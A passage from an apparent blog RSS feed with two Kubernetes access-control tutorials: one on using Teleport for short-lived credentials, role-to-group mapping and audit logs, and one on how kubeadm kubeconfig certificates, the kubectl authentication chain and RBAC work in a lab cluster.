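<p>Curious how long that bootstrap cert is actually good for? On the control plane, <code>kubeadm</code> can report the expiry of every certificate it manages, including the one embedded in <code>admin.conf</code> (kubeadm issues these for one year by default):</p>
<pre><code class="lang-bash">matt@controlplane:~$ sudo kubeadm certs check-expiration
</code></pre>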
<p>After Teleport, things are much better (no more forever-credentials):</p>
<ul>
<li>Short-lived credentials via <code>tsh</code></li>
<li>Proxy-mediated access</li>
<li>Role-based identity enforcement</li>
<li>Automatic expiry &amp; audit</li>
</ul>
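<p>For contrast, here is roughly what <code>tsh kube login</code> writes into your kubeconfig. Instead of embedded keys, the user entry is an exec plugin that fetches short-lived credentials on demand (a sketch; exact entry names and args vary by Teleport version):</p>
<pre><code class="lang-yaml">apiVersion: v1
clusters:
- cluster:
    server: https://192.168.64.4:3080   # the Teleport proxy, not the API server
  name: teleport-kubernetes
users:
- name: teleport-kubernetes
  user:
    exec:
      apiVersion: client.authentication.k8s.io/v1beta1
      command: tsh
      args:
      - kube
      - credentials
      - --kube-cluster=kubernetes
      - --teleport-cluster=teleport
</code></pre>
<p>Nothing in that file is a long-lived secret; if it leaks, an attacker still has to get past Teleport.</p>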
<div class="hn-table">
<table>
<thead>
<tr>
<td>Aspect</td><td>Before Teleport</td><td>After Teleport</td></tr>
</thead>
<tbody>
<tr>
<td>Credential type</td><td>Static admin cert</td><td>Short-lived cert via <code>tsh</code></td></tr>
<tr>
<td>Endpoint</td><td>Direct to API server</td><td>Through Teleport proxy</td></tr>
<tr>
<td>Identity</td><td>Hardcoded user</td><td>Role-based (<code>teleport-admin</code>)</td></tr>
<tr>
<td>Expiry</td><td>Manual rotation</td><td>Auto-expires (12h)</td></tr>
<tr>
<td>Audit</td><td>None</td><td>Centralized logs &amp; sessions</td></tr>
</tbody>
</table>
</div><hr />
<h2 id="heading-create-new-roles-and-users">Create New Roles and Users</h2>
<p>We’ll now create a minimal setup:  </p>
<ol>
<li>Teleport role → maps to a Kubernetes group  </li>
<li>Teleport user → inherits that role  </li>
<li>ClusterRoleBinding → grants the group permissions</li>
</ol>
<p>This follows from the <a target="_blank" href="https://goteleport.com/docs/zero-trust-access/rbac-get-started/role-templates/">documentation</a>, but also goes a little deeper.</p>
<h3 id="heading-1-teleport-role-junior-devs-maps-to-k8s-view">1) Teleport Role: <code>junior-devs</code> → maps to K8s <code>view</code>.</h3>
<p>Save the following as <code>junior-devs.yaml</code>. This creates a Teleport role that will give our user Kubernetes access.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">kind:</span> <span class="hljs-string">role</span>
<span class="hljs-attr">version:</span> <span class="hljs-string">v7</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">junior-devs</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">allow:</span>
    <span class="hljs-attr">logins:</span> [<span class="hljs-string">'<span class="hljs-template-variable">{{internal.logins}}</span>'</span>]
    <span class="hljs-attr">kubernetes_groups:</span> [<span class="hljs-string">'<span class="hljs-template-variable">{{internal.kubernetes_groups}}</span>'</span>]
    <span class="hljs-attr">node_labels:</span>
      <span class="hljs-string">'*'</span><span class="hljs-string">:</span> <span class="hljs-string">'*'</span>
    <span class="hljs-attr">kubernetes_labels:</span>
      <span class="hljs-string">'*'</span><span class="hljs-string">:</span> <span class="hljs-string">'*'</span>
    <span class="hljs-attr">kubernetes_resources:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">kind:</span> <span class="hljs-string">'*'</span>
        <span class="hljs-attr">namespace:</span> <span class="hljs-string">'*'</span>
        <span class="hljs-attr">name:</span> <span class="hljs-string">'*'</span>
        <span class="hljs-attr">verbs:</span> [<span class="hljs-string">'*'</span>]
</code></pre>
<p>Apply <strong>on the Auth host</strong> with <code>tctl</code>:</p>
<pre><code class="lang-bash">root@7867833a79e8:~<span class="hljs-comment"># tctl create junior-devs.yaml</span>
role <span class="hljs-string">"junior-devs"</span> has been created
</code></pre>
<h3 id="heading-2-teleport-user-jimbo-with-role-junior-devs">2) Teleport User: <code>jimbo</code> with role <code>junior-devs</code>.</h3>
<p>Save the following as <code>jimbo.yaml</code>. This creates a Teleport user bound to the <code>junior-devs</code> role, with a <code>kubernetes_groups</code> trait of <code>teleport-view</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">kind:</span> <span class="hljs-string">user</span>
<span class="hljs-attr">version:</span> <span class="hljs-string">v2</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">jimbo</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">roles:</span> [<span class="hljs-string">'junior-devs'</span>]
  <span class="hljs-attr">traits:</span>
    <span class="hljs-attr">kubernetes_groups:</span> [<span class="hljs-string">'teleport-view'</span>]
</code></pre>
<p>Apply <strong>on the Auth host</strong> with <code>tctl</code>:</p>
<pre><code class="lang-bash">root@7867833a79e8:~<span class="hljs-comment"># tctl create -f jimbo.yaml</span>
user <span class="hljs-string">"jimbo"</span> has been created
</code></pre>
<p>To log in as jimbo, you'll need to repeat the user enrollment process. After creating the user, go to the UI and reset authentication on the jimbo account, which generates a new sign-up link with OTP (damn OTP, I now have way too many Teleport tokens).</p>
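<p>If you'd rather stay in the terminal, the same reset can be kicked off from the Auth host; I believe <code>tctl users reset</code> prints a fresh reset link (check <code>tctl help</code> on your version):</p>
<pre><code class="lang-bash">root@7867833a79e8:~<span class="hljs-comment"># tctl users reset jimbo</span>
</code></pre>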
<p>Now for the actual log in:</p>
<pre><code class="lang-bash">matt@linux-server-1:~/teleport$ tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=jimbo --insecure
Enter password <span class="hljs-keyword">for</span> Teleport user jimbo:
WARNING: You are using insecure connection to Teleport proxy https://192.168.64.4:3080
Enter an OTP code from a device:
&gt; Profile URL:        https://192.168.64.4:3080
  Logged <span class="hljs-keyword">in</span> as:       jimbo
  Cluster:            teleport
  Roles:              junior-devs
  Kubernetes:         enabled
  Valid until:        2025-10-20 22:27:09 -0700 PDT [valid <span class="hljs-keyword">for</span> 12h0m0s]
  Extensions:         login-ip, permit-port-forwarding, permit-pty, private-key-policy

matt@linux-server-1:~/teleport$ tsh kube ls
Kube Cluster Name Labels Selected
----------------- ------ --------
kubernetes

matt@linux-server-1:~/teleport$ tsh kube login kubernetes --insecure
Logged into Kubernetes cluster <span class="hljs-string">"kubernetes"</span>. Try <span class="hljs-string">'kubectl version'</span> to <span class="hljs-built_in">test</span> the connection.
</code></pre>
<h3 id="heading-3-kubernetes-clusterrolebinding-for-the-view-group">3) Kubernetes ClusterRoleBinding for the <code>view</code> group</h3>
<p>If you don't have the ClusterRoleBinding, you're sort of in a bind.</p>
<pre><code class="lang-bash">matt@linux-server-1:~/teleport$ kubectl get po
Error from server (Forbidden): pods is forbidden: User <span class="hljs-string">"jimbo"</span> cannot list resource <span class="hljs-string">"pods"</span> <span class="hljs-keyword">in</span> API group <span class="hljs-string">""</span> <span class="hljs-keyword">in</span> the namespace <span class="hljs-string">"default"</span>
</code></pre>
<p>Since Teleport injects <code>kubernetes_groups: ["teleport-view"]</code>, you'll need to bind that <strong>group</strong> to the built‑in <code>view</code> role.</p>
<p>Create the <code>ClusterRoleBinding</code> in a separate terminal.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl create clusterrolebinding teleport-view   --clusterrole=view   --group=teleport-view
clusterrolebinding.rbac.authorization.k8s.io/teleport-view created
</code></pre>
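<p>If you prefer declarative manifests over the imperative command, the equivalent object looks like this:</p>
<pre><code class="lang-yaml">apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: teleport-view
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: view
subjects:
- apiGroup: rbac.authorization.k8s.io
  kind: Group
  name: teleport-view    # must match the kubernetes_groups trait in Teleport
</code></pre>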
<p>Then verify you can use the view role.</p>
<pre><code class="lang-bash">matt@linux-server-1:~/teleport$ kubectl get po
NAME                        READY   STATUS    RESTARTS       AGE
flask-app-ccb7dbb5b-5x5qw   1/1     Running   5 (45h ago)    19d
nginx-676b6c5bbc-45cmn      1/1     Running   13 (45h ago)   137d
</code></pre>
<p>And that's that.</p>
<h3 id="heading-teleport-ui">Teleport UI</h3>
<p><strong>Teleport Role</strong>: Go to Zero Trust Access -&gt; Roles and choose <strong>Create New Role</strong>. Then supply the name and choose Kubernetes Access with a default Kubernetes resource:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760983797549/d4d3a383-ec2d-470f-b4b0-3b24b160068e.png" alt class="image--center mx-auto" /></p>
<p><strong>Teleport User:</strong> Go to Zero Trust Access -&gt; Users and choose <strong>Create New User</strong>. Then fill in the name, role, and trait (kubernetes_groups).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760983931718/cf326a1a-e72d-4a4e-9054-9ff57166fb42.png" alt class="image--center mx-auto" /></p>
<p><strong>K8s Binding:</strong> Still done in Kubernetes as above.</p>
<h3 id="heading-status-check">Status Check</h3>
<p>This completes a minimal <strong>identity → group → RBAC</strong> pipeline: Teleport defines <em>who Jimbo is</em>, Kubernetes RBAC decides <em>what Jimbo can do</em>. Easily done via code or UI.</p>
<hr />
<h2 id="heading-teleport-kubernetes-audit">Teleport Kubernetes Audit</h2>
<p>Teleport logs every Kubernetes request. You can see this both in proxy logs and the UI. Let's take a look.</p>
<p>This is for a simple request: listing deployments in the default namespace.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ kubectl get deployment
NAME        READY   UP-TO-DATE   AVAILABLE   AGE
...
</code></pre>
<h3 id="heading-proxy-roundtrip-reverse-proxy">Proxy round‑trip (reverse proxy)</h3>
<p>You can find this in the running Teleport Docker instance when you submit a request. Below is the <strong>proxy round‑trip</strong> log, followed by the corresponding <strong>kube.request</strong> audit event (both the raw line and the UI JSON).</p>
<pre><code class="lang-bash">2025-10-20T05:03:04.563Z INFO [PROXY:PRO] Round trip completed pid:17.1 method:GET url:https://kube-teleport-proxy-alpn.teleport.cluster.local/apis/apps/v1/namespaces/default/deployments?<span class="hljs-built_in">limit</span>=500 code:200 duration:18.776759ms tls.version:772 tls.resume:<span class="hljs-literal">false</span> tls.csuite:4865 tls.server:kube-teleport-proxy-alpn.teleport.cluster.local reverseproxy/reverse_proxy.go:255
</code></pre>
<p><strong>Key fields (what they mean):</strong></p>
<ul>
<li><p><strong>method:</strong> <code>GET</code> — HTTP verb kubectl used.</p>
</li>
<li><p><strong>url:</strong> <code>.../apis/apps/v1/namespaces/default/deployments?limit=500</code> — Exact Kubernetes API path.</p>
</li>
<li><p><strong>code:</strong> <code>200</code> — Upstream API server response.</p>
</li>
<li><p><strong>tls.version / csuite / server:</strong> TLS details for the upstream hop inside Teleport (ALPN → Kube proxy).</p>
</li>
</ul>
<p>This is the raw <strong>transport layer</strong> evidence: Teleport successfully proxied a K8s API call and got a 200 back.</p>
<h3 id="heading-ui-json-same-event">UI JSON (same event)</h3>
<p>Access the Teleport UI and you can view nicely formatted audit logs.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760937189634/24c40da6-9e02-4c76-a76f-027104b1e27e.png" alt class="image--center mx-auto" /></p>
<p>And clicking into details you see the JSON.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760937247587/44b34ba1-605b-4cc0-b22e-5d1a9e75a9de.png" alt class="image--center mx-auto" /></p>
<p>Here is the actual request in all its glory.</p>
<pre><code class="lang-json">{
  <span class="hljs-attr">"addr.remote"</span>: <span class="hljs-string">"192.168.64.8:33222"</span>,
  <span class="hljs-attr">"cluster_name"</span>: <span class="hljs-string">"teleport"</span>,
  <span class="hljs-attr">"code"</span>: <span class="hljs-string">"T3009I"</span>,
  <span class="hljs-attr">"ei"</span>: <span class="hljs-number">0</span>,
  <span class="hljs-attr">"event"</span>: <span class="hljs-string">"kube.request"</span>,
  <span class="hljs-attr">"kubernetes_cluster"</span>: <span class="hljs-string">"kubernetes"</span>,
  <span class="hljs-attr">"kubernetes_groups"</span>: [
    <span class="hljs-string">"system:masters"</span>,
    <span class="hljs-string">"system:authenticated"</span>
  ],
  <span class="hljs-attr">"kubernetes_labels"</span>: {
    <span class="hljs-attr">"teleport.internal/resource-id"</span>: <span class="hljs-string">"11beab83-a0fa-48b5-8e1f-fd454a7f714c"</span>
  },
  <span class="hljs-attr">"kubernetes_users"</span>: [
    <span class="hljs-string">"teleport-admin"</span>
  ],
  <span class="hljs-attr">"login"</span>: <span class="hljs-string">"teleport-admin"</span>,
  <span class="hljs-attr">"namespace"</span>: <span class="hljs-string">"default"</span>,
  <span class="hljs-attr">"proto"</span>: <span class="hljs-string">"kube"</span>,
  <span class="hljs-attr">"request_path"</span>: <span class="hljs-string">"/apis/apps/v1/namespaces/default/deployments"</span>,
  <span class="hljs-attr">"resource_api_group"</span>: <span class="hljs-string">"apps/v1"</span>,
  <span class="hljs-attr">"resource_kind"</span>: <span class="hljs-string">"deployments"</span>,
  <span class="hljs-attr">"resource_namespace"</span>: <span class="hljs-string">"default"</span>,
  <span class="hljs-attr">"response_code"</span>: <span class="hljs-number">200</span>,
  <span class="hljs-attr">"server_hostname"</span>: <span class="hljs-string">"teleport"</span>,
  <span class="hljs-attr">"server_id"</span>: <span class="hljs-string">"785ed329-bb9b-4d16-8904-1b50d75377b5"</span>,
  <span class="hljs-attr">"server_labels"</span>: {
    <span class="hljs-attr">"teleport.internal/resource-id"</span>: <span class="hljs-string">"11beab83-a0fa-48b5-8e1f-fd454a7f714c"</span>
  },
  <span class="hljs-attr">"server_version"</span>: <span class="hljs-string">"18.2.4"</span>,
  <span class="hljs-attr">"sid"</span>: <span class="hljs-string">""</span>,
  <span class="hljs-attr">"time"</span>: <span class="hljs-string">"2025-10-20T05:03:04.565Z"</span>,
  <span class="hljs-attr">"uid"</span>: <span class="hljs-string">"9544742b-2cfa-49d9-abab-edd7e7b06554"</span>,
  <span class="hljs-attr">"user"</span>: <span class="hljs-string">"teleport-admin"</span>,
  <span class="hljs-attr">"user_cluster_name"</span>: <span class="hljs-string">"teleport"</span>,
  <span class="hljs-attr">"user_kind"</span>: <span class="hljs-number">1</span>,
  <span class="hljs-attr">"user_roles"</span>: [
    <span class="hljs-string">"access"</span>,
    <span class="hljs-string">"editor"</span>
  ],
  <span class="hljs-attr">"user_traits"</span>: {
    <span class="hljs-attr">"kubernetes_groups"</span>: [
      <span class="hljs-string">"system:masters"</span>
    ],
    <span class="hljs-attr">"kubernetes_users"</span>: [
      <span class="hljs-string">"teleport-admin"</span>
    ],
    <span class="hljs-attr">"logins"</span>: [
      <span class="hljs-string">"root"</span>,
      <span class="hljs-string">"ubuntu"</span>,
      <span class="hljs-string">"ec2-user"</span>
    ]
  },
  <span class="hljs-attr">"verb"</span>: <span class="hljs-string">"GET"</span>
}
</code></pre>
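<p>Once you export events like this (Teleport can ship audit events to a file or a SIEM), they are easy to slice with <code>jq</code>. A quick sketch, with an inline heredoc standing in for a real export and the event objects trimmed to a few fields:</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Pull who/what/result out of kube.request events, one TSV line each</span>
<span class="hljs-comment"># (events trimmed to a few fields; a real export has the full schema above)</span>
jq -r 'select(.event == "kube.request")
  | [.time, .user, .verb, .resource_kind, .response_code]
  | @tsv' &lt;&lt;'EOF'
{"event":"kube.request","time":"2025-10-20T05:03:04.565Z","user":"teleport-admin","verb":"GET","resource_kind":"deployments","response_code":200}
{"event":"user.login","time":"2025-10-20T05:00:00.000Z","user":"teleport-admin"}
EOF
</code></pre>
<p>The <code>select</code> drops the unrelated login event, so only the Kubernetes request survives.</p>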
<p><strong>A Logic of Sorts for the JSON:</strong></p>
<p>Although you can surely decipher most of these, here is a rough map from a less technical point of view. Simple, clean, and fully auditable.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Category</td><td>Fields</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Who</strong></td><td><code>user</code>, <code>login</code>, <code>user_roles</code>, <code>kubernetes_groups</code></td></tr>
<tr>
<td><strong>What</strong></td><td><code>verb</code>, <code>resource_kind</code>, <code>resource_api_group</code></td></tr>
<tr>
<td><strong>Where</strong></td><td><code>namespace</code>, <code>cluster_name</code>, <code>addr.remote</code></td></tr>
<tr>
<td><strong>When</strong></td><td><code>time</code>, <code>uid</code></td></tr>
<tr>
<td><strong>Result</strong></td><td><code>response_code</code></td></tr>
<tr>
<td><strong>Server</strong></td><td><code>server_id</code>, <code>server_hostname</code>, <code>server_version</code></td></tr>
</tbody>
</table>
</div><hr />
<h2 id="heading-wrap-up-access-control-actually-done">Wrap-Up: Access Control, Actually Done</h2>
<p>That’s a wrap — for now — on Teleport and Kubernetes access.</p>
<p>What started as a quick experiment to make kubeconfig a little safer turned into an interesting, albeit time-consuming, exercise. The more I used Teleport, the more I saw that it replaces an entire trust model. </p>
<ul>
<li>Short-lived certs instead of forever-tokens</li>
<li>Centralized user and role management</li>
<li>Audit trails that are at your fingertips</li>
</ul>
<p>Teleport is not just for Kubernetes, but it is clearly useful for leveling up Kubernetes RBAC. Teleport isn’t trying to reinvent Kubernetes security; it’s trying to make identity-aware access sane. </p>
<p>I’ll probably revisit this when I start layering in SSO and stuff, but for now? It’s a clean, comprehensible access model that’s hard not to like.</p>
]]></content:encoded></item><item><title><![CDATA[Access Control, Actually: Kubeadm and the Roots of Kubernetes Access]]></title><description><![CDATA[Let’s start simple: you’ve got a Kubernetes cluster running in your lab. How do you get into it?The easiest way — the one you will always use in a lab running on your laptop — is to SSH directly into a node. You run:
matt.brown@matt ~ % ssh matt@192....]]></description><link>https://cloudsecburrito.com/access-control-actually-kubeadm-and-the-roots-of-kubernetes-access</link><guid isPermaLink="true">https://cloudsecburrito.com/access-control-actually-kubeadm-and-the-roots-of-kubernetes-access</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[rbac]]></category><category><![CDATA[Security]]></category><category><![CDATA[authentication]]></category><category><![CDATA[authorization]]></category><category><![CDATA[kubeadm]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 13 Oct 2025 20:58:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760388644975/5dec7779-ac16-46a2-b0ca-91ad77f25ac2.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Let’s start simple: you’ve got a Kubernetes cluster running in your lab. How do you get into it?<br />The easiest way — the one you will always use in a lab running on your laptop — is to <strong>SSH directly into a node</strong>. You run:</p>
<pre><code class="lang-bash">matt.brown@matt ~ % ssh matt@192.168.64.15
...
matt@ciliumcontrolplane:~$ kubectl get po
No resources found <span class="hljs-keyword">in</span> default namespace.
</code></pre>
<p>Boom. You’re in. No VPN, no IAM, no hoops. It works because that node has <code>kubectl</code> and an admin kubeconfig with cluster-admin rights. But it’s also the worst possible way to manage access. That SSH key sitting on your laptop? It’s permanent. The cluster logs? They’ll only tell you “user: ubuntu.” If multiple people share that key, you’re in the dark.</p>
<p>This post kicks off a short series exploring how we actually access Kubernetes. From SSH and bastions to identity-aware access with Teleport. The goal is to look at what happens between “I need to connect to that cluster” and “who ran that command.”</p>
<hr />
<h2 id="heading-who-am-i">Who Am I?</h2>
<p>So now that I’m on the node — who exactly <em>am I</em>? Run <code>whoami</code>, and Linux will tell you the obvious.</p>
<pre><code class="lang-bash">matt@controlplane:~$ whoami
matt
</code></pre>
<p>That’s great. I’m <code>matt</code>, local user, shell access confirmed. But who does Kubernetes think I am? The moment I type <code>kubectl get pods</code>, <code>kubectl</code> uses whatever credentials are sitting under <code>~/.kube/config</code> or the node’s service account token.</p>
<p>In practice, that means I’m probably acting as <code>kubernetes-admin</code> or some other <strong>identity with cluster-admin rights</strong>, because that’s what the node was bootstrapped with.</p>
<p>If I check the current context, I’ll see something like this.</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl config current-context
kubernetes-admin@kubernetes
</code></pre>
<p>Cool — I’m “kubernetes-admin@kubernetes.” Not <em>this</em> admin, not <em>that</em> admin — just <em>kubernetes-admin.</em></p>
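<p>On newer clusters (roughly v1.27 and up), you can skip the guessing and ask the API server who it thinks you are. Your groups will differ depending on how the cert was issued, but it looks something like this:</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl auth whoami
ATTRIBUTE   VALUE
Username    kubernetes-admin
Groups      [system:masters system:authenticated]
</code></pre>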
<h3 id="heading-contexts-users-and-clusters-a-quick-decoding">Contexts, Users, and Clusters (a quick decoding)</h3>
<p>A Kubernetes <strong>context</strong> is just a tuple that brings together three things from your kubeconfig:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Field</td><td>Meaning</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Cluster</strong></td><td>Which API server you’re talking to (its address and CA cert).</td></tr>
<tr>
<td><strong>User</strong></td><td>Which credential you’re using (client cert, token, exec plugin, etc.).</td></tr>
<tr>
<td><strong>Namespace</strong></td><td>The default namespace for commands when you don’t specify one.</td></tr>
</tbody>
</table>
</div><p>So when <code>kubectl config current-context</code> prints <code>kubernetes-admin@kubernetes</code>, it’s shorthand for: “Use the <em>user</em> <code>kubernetes-admin</code> when connecting to the <em>cluster</em> named <code>kubernetes</code>.” It means the certificate in your kubeconfig file identifies you as the logical user <code>kubernetes-admin</code>.</p>
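<p>You can see that tuple laid out (and spot stale entries) with:</p>
<pre><code class="lang-bash">matt@controlplane:~$ kubectl config get-contexts
CURRENT   NAME                          CLUSTER      AUTHINFO           NAMESPACE
*         kubernetes-admin@kubernetes   kubernetes   kubernetes-admin
</code></pre>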
<p>If you check your kubeconfig (<code>~/.kube/config</code>), you’ll see something like:</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">client-certificate-data:</span> <span class="hljs-string">REDACTED</span>
    <span class="hljs-attr">client-key-data:</span> <span class="hljs-string">REDACTED</span>

<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes</span>
  <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">REDACTED</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:6443</span>

<span class="hljs-attr">current-context:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">Config</span>
<span class="hljs-attr">preferences:</span> {}

<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">kubernetes-admin@kubernetes</span>
  <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">kubernetes</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">kubernetes-admin</span>
</code></pre>
<p>That’s where the magic lives — in this simple static config file. In the lab, it was created when the cluster was bootstrapped with <code>kubeadm</code>, and it uses a client certificate signed by the cluster’s Certificate Authority (CA).</p>
<p>The <code>client-certificate-data</code> and <code>client-key-data</code> fields are just base64-encoded TLS credentials: a certificate and private key that prove who you are to the Kubernetes API server. They’re signed by the cluster’s CA during bootstrap, which is why the API server trusts them without any further login. In short: when <code>kubectl</code> connects, it presents that cert–key pair, and the API server says, “yep, that’s my guy!”</p>
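<p>You don't have to take that on faith. The sketch below builds a throwaway key and certificate with a kubeconfig-style subject, base64-encodes the cert the way <code>client-certificate-data</code> stores it, then decodes it back to read the identity inside. Against a real kubeconfig you'd feed the actual field through the same <code>base64 -d | openssl x509</code> pipeline (<code>base64 -w0</code> is the GNU flag for no line wrapping):</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Throwaway key + self-signed cert; the subject mimics a kubeadm admin cert</span>
openssl req -x509 -newkey rsa:2048 -nodes -keyout demo.key -out demo.crt \
  -days 1 -subj "/O=system:masters/CN=kubernetes-admin" 2&gt;/dev/null

<span class="hljs-comment"># This is the form a kubeconfig stores it in...</span>
b64=$(base64 -w0 &lt; demo.crt)

<span class="hljs-comment"># ...and this is how to read the identity (and expiry) back out of it</span>
echo "$b64" | base64 -d | openssl x509 -noout -subject -enddate
</code></pre>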
<p>The CA’s own certificates and keys live on every control-plane node under <code>/etc/kubernetes/pki/</code>. They’re not stored in etcd, as I once thought. Each control-plane node has a copy so the API server running there can verify incoming client certificates and sign new ones.</p>
<p>It’s meant for bootstrapping, not daily use. But because it works — and because it never expires until the cert does — it quietly becomes the kubeconfig you keep using forever.</p>
<h3 id="heading-the-auth-chain-of-kubectl">The Auth Chain of kubectl</h3>
<p>Now that we know who we are, we can ask what actually happens when you run a simple command like:</p>
<pre><code class="lang-bash">kubectl get pods
</code></pre>
<p>Every part of your kubeconfig file gets pulled into action:</p>
<ol>
<li><p><strong>kubectl reads your current context</strong><br /> It looks up the <code>current-context</code> (<code>kubernetes-admin@kubernetes</code>) to find which <em>cluster</em> and <em>user</em> to use.</p>
</li>
<li><p><strong>kubectl authenticates to the API server</strong><br /> It connects to the cluster’s API endpoint (from <code>clusters.server</code>) and presents your client certificate and key (from <code>users.user</code>). This is mutual TLS.</p>
</li>
<li><p><strong>The API server validates your certificate</strong><br /> The API server checks your client certificate against the cluster’s CA, stored locally on the control-plane node under <code>/etc/kubernetes/pki/ca.crt</code>. If the signature is valid, it extracts the <strong>subject</strong> (like <code>CN=kubernetes-admin</code>) and uses that as your Kubernetes identity.</p>
</li>
<li><p><strong>Kubernetes decides what you’re allowed to do</strong><br /> Once authenticated, authorization kicks in. The API server checks your identity against <strong>RBAC roles and role bindings</strong>, which are stored in etcd. That’s what determines whether <code>kubectl get pods</code> returns a list — or a <code>Forbidden</code> message.</p>
</li>
<li><p><strong>Audit trail (if enabled)</strong><br /> Finally, the API server logs the request with your derived identity:</p>
<pre><code class="lang-bash"> user=<span class="hljs-string">"kubernetes-admin"</span> verb=<span class="hljs-string">"list"</span> resource=<span class="hljs-string">"pods"</span>
</code></pre>
</li>
</ol>
<p>In short, the chain looks like this:</p>
<pre><code class="lang-bash">kubectl → client certificate → API server → <span class="hljs-built_in">local</span> CA trust → RBAC (etcd)
</code></pre>
<p>It’s all local, self-contained, and cryptographically verified. Of course, if that client certificate gets shared or stolen, the API server will happily authenticate anyone holding it. There’s no MFA, no identity federation, and no notion of <em>who the human really was</em> behind the request.</p>
<hr />
<h2 id="heading-what-can-i-do">What Can I Do?</h2>
<p>Once the API server validates your identity, it moves from <strong>authentication</strong> to <strong>authorization</strong>. Every request coming into Kubernetes carries the user identity that was derived from your authentication method.</p>
<p>For example, after validating your client certificate, the API server sees you as:</p>
<pre><code class="lang-bash">user=<span class="hljs-string">"kubernetes-admin"</span>
groups=[<span class="hljs-string">"system:authenticated"</span>]
</code></pre>
<p>It now checks that identity against Kubernetes <strong>RBAC</strong> (Role-Based Access Control).</p>
<h3 id="heading-rbac-101">RBAC 101</h3>
<p>Kubernetes RBAC is built from four object types:</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td>Kind</td><td>Scope</td><td>Purpose</td></tr>
</thead>
<tbody>
<tr>
<td><strong>Role</strong></td><td>Namespaced</td><td>Set of allowed actions (<code>verbs</code>) on resources within a single namespace.</td></tr>
<tr>
<td><strong>ClusterRole</strong></td><td>Cluster-wide</td><td>Same as Role, but not bound to a namespace.</td></tr>
<tr>
<td><strong>RoleBinding</strong></td><td>Namespaced</td><td>Grants permissions defined in a Role to users, groups, or service accounts.</td></tr>
<tr>
<td><strong>ClusterRoleBinding</strong></td><td>Cluster-wide</td><td>Grants ClusterRole permissions across the entire cluster.</td></tr>
</tbody>
</table>
</div><p>Each Role or ClusterRole lists <em>verbs</em> (what actions you can take) and <em>resources</em> (what they apply to).<br />Bindings then link those rules to actual identities.</p>
<h3 id="heading-example-limiting-access">Example: Limiting Access</h3>
<p>Let’s see this in action by creating a restricted user and verifying permissions.</p>
<p><strong>Step 1 — Create a new user cert</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ openssl genrsa -out lab-user.key 2048
matt@controlplane:~/rbac$ openssl req -new -key lab-user.key -subj <span class="hljs-string">"/CN=lab-user/O=lab-users"</span> -out lab-user.csr
matt@controlplane:~/rbac$ sudo openssl x509 -req -<span class="hljs-keyword">in</span> lab-user.csr   -CA /etc/kubernetes/pki/ca.crt   -CAkey /etc/kubernetes/pki/ca.key   -CAcreateserial   -out lab-user.crt -days 365
Certificate request self-signature ok
subject=CN = lab-user, O = lab-users
</code></pre>
<p><strong>Step 2 — Add the user to your kubeconfig</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl config set-credentials lab-user   --client-certificate=lab-user.crt   --client-key=lab-user.key
User <span class="hljs-string">"lab-user"</span> <span class="hljs-built_in">set</span>.
matt@controlplane:~/rbac$ kubectl config set-context lab-user@kubernetes   --cluster=kubernetes --user=lab-user
Context <span class="hljs-string">"lab-user@kubernetes"</span> created.
</code></pre>
<p><strong>Step 3 — Try to access pods</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl --context lab-user@kubernetes get pods
Error from server (Forbidden): pods is forbidden: User <span class="hljs-string">"lab-user"</span> cannot list resource <span class="hljs-string">"pods"</span> <span class="hljs-keyword">in</span> API group <span class="hljs-string">""</span> <span class="hljs-keyword">in</span> the namespace <span class="hljs-string">"default"</span>
</code></pre>
<p><strong>Step 4 — Create a Role and RoleBinding</strong></p>
<pre><code class="lang-bash">matt@controlplane:~/rbac$ kubectl create role pod-reader --verb=get,list --resource=pods
role.rbac.authorization.k8s.io/pod-reader created
